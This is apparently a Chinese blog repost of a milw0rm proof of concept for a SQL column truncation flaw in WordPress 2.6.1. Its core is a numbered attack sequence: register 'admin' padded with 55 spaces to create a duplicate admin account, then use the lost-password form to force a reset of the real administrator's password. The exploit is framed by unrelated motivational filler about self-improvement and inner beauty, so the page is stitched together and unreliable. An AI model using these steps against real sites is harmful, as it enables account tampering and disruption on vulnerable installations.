WordPress 2.6.1 SQL Column Truncation Vulnerability分析

不要去听别人的忽悠,你人生的每一步都必须靠自己的能力完成。自己肚子里没有料,手上没本事,认识再多人也没用。人脉只会给你机会,但抓住机会还是要靠真本事。所以啊,修炼自己,比到处逢迎别人重要的多。
用wordpress的要注意了,不过拿我这里测试就没效果了,我从一开始就是关闭用户注册的。 # WordPress 2.6.1 SQL Column Truncation Vulnerability (PoC)
#
# found by irk4z[at]yahoo.pl
# homepage: http://irk4z.wordpress.com/
#
# this is not critical vuln [;
#
# first, read this discovery:
# http://www.suspekt.org/2008/08/18/mysql-and-sql-column-truncation-vulnerabilities/
#
# in this hack we can remote change admin password, if registration enabled
#
# greets: Stefan Esser, Lukasz Pilorz, cOndemned, tbh, sid.psycho, str0ke and all fiends 1. go to url: server.com/wp-login.php?action=register 2. register as: login: admin x
email: your email^ admin[55 space chars]x now, we have duplicated 'admin' account in database 3. go to url: server.com/wp-login.php?action=lostpassword 4. write your email into field and submit this form 5. check your email and go to reset confirmation link 6. admin's password changed, but new password will be send to correct admin email ;/ # milw0rm.com

到此这篇关于WordPress 2.6.1 SQL Column Truncation Vulnerability分析 就介绍到这了。人的美不在外貌、 衣服和发式,而在于它的本身,在于他的心。要是人没有内心的美,我们会常常厌恶他漂亮的外表。更多相关WordPress 2.6.1 SQL Column Truncation Vulnerability分析 内容请查看相关栏目,小编编辑不易,再次感谢大家的支持!